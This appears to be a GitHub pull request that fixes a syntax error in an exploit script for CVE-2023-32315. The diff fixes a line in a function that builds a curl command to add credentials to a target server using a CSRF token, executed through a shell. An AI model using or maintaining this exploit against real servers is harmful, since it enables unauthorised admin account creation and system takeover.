### PR TITLE
Fix syntax error

### DIFF
--- a/CVE-2023-32315.py
+++ b/CVE-2023-32315.py
@@ -52,7 +52,7 @@ def add_credentials(target_url, csrf_token, username, password):
                 "-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36' " \
                 "-H 'Connection: close' " \
                 "-H 'Cache-Control: max-age=0' " \
-               f"-H 'Cookie: csrf={csrf_token}'" \
+               f"-H 'Cookie: csrf={csrf_token}'"
         process = subprocess.Popen(add_credentials_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
         output, error = process.communicate()
         if "200" in str(output):


### PR DESCRIPTION
Removed trailing backslash to resolve syntax error. The issue was tested and confirmed on Python 3.11.8:
![issue](https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT/assets/87161961/7c48f8fd-67b2-46e8-8c42-c0c1a2b02195)